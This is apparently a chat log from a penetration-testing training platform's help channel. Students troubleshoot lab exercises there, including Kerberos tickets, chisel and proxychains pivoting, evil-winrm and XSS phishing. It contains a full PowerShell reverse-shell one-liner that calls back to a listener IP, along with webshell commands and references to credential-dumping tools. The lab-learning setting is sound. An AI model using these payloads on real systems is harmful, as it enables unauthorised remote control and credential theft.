session setup failed: NT_STATUS_INVALID_PARAMETER
What am i doing wrong
Ticket is probably expired
so I have to use the other one maybe
if I check info I get an error: klist -k -t krb5cc_647401106_HRJDux
Keytab name: FILE:krb5cc_647401106_HRJDux
klist: Unsupported key table format version number while starting keytab scan
or how do I get info about it?
Read the module
ok
ticket is expired
Listing keytab File Information: klist -k -t Do you mean this command
I can't see julio's tickets
That works if it's a keytab, this is a cache file
Iirc shouldn't matter
ah ok
you need to find the path where the ticket is
it's in /tmp
yes, and you need to verify if the ticket is valid or not
verifying by trying each ticket of julio?
yeah there are two of him
Yep one is expired one isn't
Should be able to use klist
I forget though if the files in tmp have a file extension or not
with klist you will see "Valid starting" "Expires" this will tell you if the ticket is valid or not
Yeah, that's the default as well if neither -c nor -k is specified
ah i see
Hi guys, sorry if I missed an answer somewhere: I'm using the htba workstation, I'm doing the xss module rn and I can't make netcat listen on port 80 as it is occupied (killing the processes was a bad idea, I tried three times), and I can't reroute the traffic to port 8080. Is this technically possible (meaning I'm doing something wrong), or are such tasks better solved on my own vm/system?
already do that, but Words.GetWordList() gave me an error somehow even though I already reference the Assembly.dll
You can have netcat listen on other ports
The pwnbox uses port 80 for the vnc client to reach you to use it
yes, of course, but when I tried to reroute the http traffic to 8080 - well, it was not very fruitful
Wdym "reroute"
If you're having netcat listen on 8080 you're not 'rerouting' anything
And all you'd have to do for revshell stuff is modify the port you use to be 8080
Oh I see
well, I used "sudo sysctl -w net.ipv4.ip_forward=1" and "sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080"
I'm stuck on the "Phishing" part of the xss module, where you need to send the malicious link to get the credentials
done
Is the eth0 on the target or your pwnbox :)
If it's on either you need to use the tun0
As that's generally the interface that will have the 10.x.x.x subnet
god, why am I that dumb
thanks a lot
Common sense helps
How does the interface know to redirect... if nothing touches it
#Module: DACL Attack I
#Skills Assessment
Could use a sanity check here. I'm struggling with one of the tools I believe is needed to complete the last question. Can I DM anyone?
@static roost I can try to help you with my poor skills if you're willing to help me as well 😅
Send the error output
I was able to pull the Wordlist earlier.
An object reference is required for the non-static field, method, or property 'Words.GetWordList()'
You're calling it directly. You need to instantiate an object from that class first using the new keyword.
@quaint hemlock Or you could directly invoke it during instantiation by calling the class constructor ||new Words().GetWordList()||
thx a lot! it works
DM
I need some help with "Skills Assessment - File Upload Attacks" can I DM someone
Hi, I took a couple of weeks off from HTB Academy after getting stuck on the last lab of the Nmap module, so I think I want to review the whole module. Is there a walkthrough of the entire module in one video? I couldn't find one.
no, walkthroughs for modules greater than Tier 0 violate the ToS
Ok thanks
What do you recommend at this point? I have completed the easy and medium Nmap labs and taken a couple of weeks off of HTB and really want to complete the last lab and understand what I learn, but I forgot my prior knowledge of Nmap.
Re-read the module, re-read your notes and do the labs again
That's what I would do to refresh my memory, but other people are different
Ok cool
You have to decide, you may be able to skim the module and remember but you have to go further
Ok thanks
I always do this so that if I get stuck on a topic, I look for a YouTube video or a video on Udemy on the topic.
If you have specific questions, then you can always ask here.
But if it's about building up knowledge, as you write, and the module doesn't help you with that, then I suggest the way via YouTube or Udemy.
There are sometimes situations when you don't understand what the author is trying to say. Then you watch a video or read a text by someone else who explains exactly the same thing, but in different words, and suddenly it clicks.
After that, you're sure to understand what the author was trying to say in the module.
@quasi wave @acoustic owl's advice is really great
Ok thanks
Try that one with the pwnbox and not your own vm and it might work instantly
which module covers detailed firewall evasion??
Network Enumeration with Nmap
https://academy.hackthebox.com/module/19/section/106
these are for scans. I needed some for reverse shells
There is no module for this
ok thanks I was in the payloads and shells module so I thought of digging a little deeper
Hi, I am having trouble with the windows powershell reverse shell
I am getting an error when I run this command powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
I have disabled the firewall
I cannot upload the error code because mee6 is removing them
this is one very short snippet
... stem.Net.Sockets.TCPClient('10.10.14.158',443); = .GetStream();[byte[ ...
of the error
To upload images, you need to verify your user. Read and follow #welcome
Which module, section and question is this?
start cmd.exe not powershell.exe
ok
thanks it worked
I thought both were the same and I preferred using pwsh on my system
no, PowerShell and cmd.exe are not the same thing
now I know
Is there a way to reset the bloodhound default creds? I'm unable to log in. It says my creds are stored in my browser but I can't seem to find them listed in firefox. I tried the steps on this page. https://neo4j.com/docs/operations-manual/current/configuration/password-and-user-recovery/#disable-authentication
But I don't see this option in the config file: dbms.security.auth_enabled=false
I see one for bolt # Bolt SSL configuration
#dbms.ssl.policy.bolt.enabled=true
#dbms.ssl.policy.bolt.base_directory=certificates/bolt
This page describes how to reset a password to recover a user's access when their password is lost. It specifically focuses on how to recover an admin user if all the admin users have been unassigned the admin role, and how to recreate the built-in admin role if it has been dropped.
Could someone tag me if they have a solution please?
Just try to add this option to the Config
dbms.security.auth_enabled=false
I finished Attacking Common Services - Hard Lab in less than 5 minutes and this was not even close to Hard, can someone double check whether I did the intended?
maybe in DM
Fuck yeah dude. Thanks
You can write to me, but hard is not always hard.
Hi, I am doing the AD Skills Assessment and I am done with part I. I use impacket-secretsdump with credentials to dump hashes from machines and dc01. I understand on the dc I need to use an account with dcsync rights to dump. I don't understand on other machines why some credentials worked and some didn't (the one that has dcsync rights can't be used to dump anything from another machine)
is htb down?
probably you have to pivot through some machine to reach the target
scheme like foothold -> pivot -> target
?
Idk man
i know
you just have to use another host as jump
probably that machine does not have a route to 172.16.5.19
Hello everyone! Having trouble setting up chisel correctly: I started the chisel reverse server: ./chisel server -p 1234 --socks5 --reverse -v
2023/10/22 06:40:32 server: Reverse tunnelling enabled
2023/10/22 06:40:32 server: Fingerprint bjWtlRu7rQvC4LPUhmFdppSQJOKgGf0u2qug0TOQlHE=
2023/10/22 06:40:32 server: Listening on http://0.0.0.0:1234
2023/10/22 06:40:44 server: session#1: Handshaking with 10.129.178.104:62447...
2023/10/22 06:40:45 server: session#1: Verifying configuration
2023/10/22 06:40:45 server: session#1: tun: Created (SOCKS enabled)
2023/10/22 06:40:45 server: session#1: tun: SSH connected
2023/10/22 06:40:45 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
Then on the target: ./chisel client -v 10.10.15.38:1234 R:socks
2023/10/22 10:51:10 client: Handshaking...
2023/10/22 10:51:10 client: Sending config
2023/10/22 10:51:10 client: tun: SSH connected
But if I want to ping with proxychains it doesn't connect: roxychains ping inlanefreight.htb
ProxyChains-3.1 (http://proxychains.sf.net)
ERROR: ld.so: object 'libproxychains.so.3' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
PING inlanefreight.htb (172.16.1.15) 56(84) bytes of data.
^C
--- inlanefreight.htb ping statistics ---
9 packets transmitted, 0 received, 100% packet loss, time 8097ms
What am i doing wrong?
ProxyChains allows to run any program through HTTP or SOCKS proxy. This tool forces all connections of given application to follow through user-defined list of proxies ( aka proxy chains ).
I can't ping with proxychains? are you sure?
Yes
you should take a look at how OSI model works
ok
layer 3 packets are encapsulated by layer 4 and then layer 5
You can use other tools but reread the module and, as @sly dome says, read up on OSI. Professor Messer has free videos
also take a look at ligolo-ng, a tool that creates a tunnel using gVisor which works on layer 3
pivoting with it enables you to do pings and usual nmap scans like SYN scans
Other question: kerberos config file: is it case sensitive?
like inanefreight.htb or INLANEFREIGHT.HTB
Hey, will the .lnk or .scf file method on SMB work if the SMB host is linux-based?
Hello everyone! Set up chisel server and client, but if I want to connect it can't resolve dc01.inlanefreight.htb even though it's in the hosts file. command: proxychains evil-winrm -i dc01 -r inlanefreight.htb
Info: Establishing connection to remote endpoint
|DNS-request| dc01.inlanefreight.htb
|DNS-request| fe80::1%enp0s3
What am I doing wrong?
DNS normally uses UDP.
Proxychains supports TCP as far as I know.
Therefore use the IP and not a domain name
When will you write a Ligolo-NG section for the pivoting module? 😉
SOCKS5 supports UDP
proxychains3 (the one that comes with Parrot) supports SOCKS5
This one?
What's Jose's NTLM hash?
If yes, it has nothing to do with a DCSync
i can help
lemme check notes
I just found the flag with the webshell
also I sent myself a rev shell with Nishang invokeTCP
you have some useful commands to find files by name
what
with a simple PHP webshell you can use spaces in the GET/POST parameter
do it from the browser
use the source
ctrl + u
more comfy view
cmd=dir c:\
should work
what is your webshell?
worked?
now
use god mode enumeration
u know the file name
cmd=powershell gci -recurse -filter "flag.txt" -File
😉
@acoustic owl even if I use the ip it doesn't work
any time dude
@sly dome the error exists even with proxychains3
I don't know your problem, I only said that SOCKS5 supports UDP
and that the usual proxychains installation supports SOCKS5
I'm trying to authenticate with a kerberos ticket: proxychains3 evil-winrm -i 172.16.1.15 -r inlanefreight.htb
but it fails
Is the target machine for the section of this module supposed to have internet access? https://academy.hackthebox.com/module/147/section/1318
no lab machine has internet access
I set up both chisel server and client
right? 10x easier to blast through the module with ligolo-ng, though I did things both ways during it
||mimikatz|| is your friend
I'm doing some things
for example I'm skipping all metasploit stuff xd
go for it
I really dislike Metasploit for pivoting
will think about it, for now my time is very limited
I'm stuck for hours trying to authenticate evil-winrm with kerberos auth over proxychains. I set up chisel server and client as well as exported the ticket locally. But if I run the command: proxychains evil-winrm -i dc01 -r inlanefreight.htb it always fails!
guess I followed all the steps in the section
Module and Section?
Hello, I'm returning to the DNS section of the Footprinting module. I don't think I am getting all the information I should be, I suspect that the instance of the DNS server I am communicating with isn't communicating with another DNS server. I've included why I am thinking that, is this a reasonable suspicion?
└─$ dig afxr inlanefreight.htb @10.129.42.195
;; communications error to 10.200.60.101#53: timed out
;; communications error to 10.200.60.101#53: timed out
;; communications error to 10.200.60.101#53: timed out
; <<>> DiG 9.19.17-1-Debian <<>> afxr inlanefreight.htb @10.129.42.195
;; global options: +cmd
Module: Password Attacks, Section: Pass the ticket from Linux, optional exercise
Is the Target machine started?
Are you connected to the VPN?
Have you tried from the PwnBox?
yes to all
even tried to switch vpn groups, but they all are targeting that ip
you have your inlanefreight ip wrong in the hosts file